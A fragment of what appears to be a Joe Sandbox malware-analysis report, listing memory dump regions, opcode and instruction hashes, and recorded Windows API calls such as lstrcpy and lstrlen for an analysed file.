                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcess
                          • String ID: @
                          • API String ID: 1357844191-2766056989
                          • Opcode ID: f8da4bc4a83bd3a811a051bdf15119e909eca2ae04225e41fa42f14c3ef5cca1
                          • Instruction ID: 1d601e5f5870242b1b3877a353fef1648872210b148151bdb5f38178124714ce
                          • Opcode Fuzzy Hash: f8da4bc4a83bd3a811a051bdf15119e909eca2ae04225e41fa42f14c3ef5cca1
                          • Instruction Fuzzy Hash: 7521AE716006018FEB218B20DC8ABB673E8EB42700F484978F956CB684E7B4E945C750
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003C244C
                          • lstrlen.KERNEL32(00000000), ref: 003C24E9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003C2570
                          • lstrlen.KERNEL32(00000000), ref: 003C2577
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 2ef64c5766caaf284d02bc90541dd5835231465c7263e89001d118f624503f45
                          • Instruction ID: 9ee54770ce703603535d8d83619ea0b6cd5c8a51a50b7dd2eb33ecf8cd8ec77b
                          • Opcode Fuzzy Hash: 2ef64c5766caaf284d02bc90541dd5835231465c7263e89001d118f624503f45
                          • Instruction Fuzzy Hash: 6481BEB0E002069BDB15DB99DC44FAFB7B5AB95300F18806DE908EB281EB759D46CB94
                          APIs
                            • Part of subcall function 003A1610: lstrcpy.KERNEL32(00000000), ref: 003A162D
                            • Part of subcall function 003A1610: lstrcpy.KERNEL32(00000000,?), ref: 003A164F
                            • Part of subcall function 003A1610: lstrcpy.KERNEL32(00000000,?), ref: 003A1671
                            • Part of subcall function 003A1610: lstrcpy.KERNEL32(00000000,?), ref: 003A1693
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A1557
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A1579
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A159B
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A15FF
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID:
                          • API String ID: 3722407311-0
                          • Opcode ID: 81e8c81cc4692ba70bf398e7a8ed7cd20faee30b9744219f8170605c8ee420c2
                          • Instruction ID: 190d232eea561456f0100617e9c91235d47006f476e140e246ac847506106da9
                          • Opcode Fuzzy Hash: 81e8c81cc4692ba70bf398e7a8ed7cd20faee30b9744219f8170605c8ee420c2
                          • Instruction Fuzzy Hash: 7A31A275A11B029FC725DF7AC588957BBE5FF8A705B05492EA896C7B10DB30F811CB80
                          APIs
                          • lstrcpy.KERNEL32(00000000), ref: 003C15A1
                          • lstrcpy.KERNEL32(00000000,?), ref: 003C15D9
                          • lstrcpy.KERNEL32(00000000,?), ref: 003C1611
                          • lstrcpy.KERNEL32(00000000,?), ref: 003C1649
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID:
                          • API String ID: 3722407311-0
                          • Opcode ID: 46e4edcbcf8bb7fd75b1295affbbb66ce908598d47d3182ef7f7bb689d9bb223
                          • Instruction ID: 7f3886ff216cc917f36107378d1212be8bbabb7350987f77bea70d1cf275a144
                          • Opcode Fuzzy Hash: 46e4edcbcf8bb7fd75b1295affbbb66ce908598d47d3182ef7f7bb689d9bb223
                          • Instruction Fuzzy Hash: 1221F774601B028BD736DF6AD858F17B7F4EF46700B04491DA886C7A41EB30EC11DB90
                          APIs
                          • lstrcpy.KERNEL32(00000000), ref: 003A162D
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A164F
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A1671
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A1693
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID:
                          • API String ID: 3722407311-0
                          • Opcode ID: d3a4a7944db3ac43f678f072883832ce1e956cc4a90f3d23a1f77df458418cdb
                          • Instruction ID: 54e6bd68ed43e0b4f8569e1b5c9e3c18c795e844e9d776e09428b89b4ded2cc7
                          • Opcode Fuzzy Hash: d3a4a7944db3ac43f678f072883832ce1e956cc4a90f3d23a1f77df458418cdb
                          • Instruction Fuzzy Hash: C3115274A12B039BDB259F79D40C927B7F8FF46701B09052EA896C7B50EB30E811CB90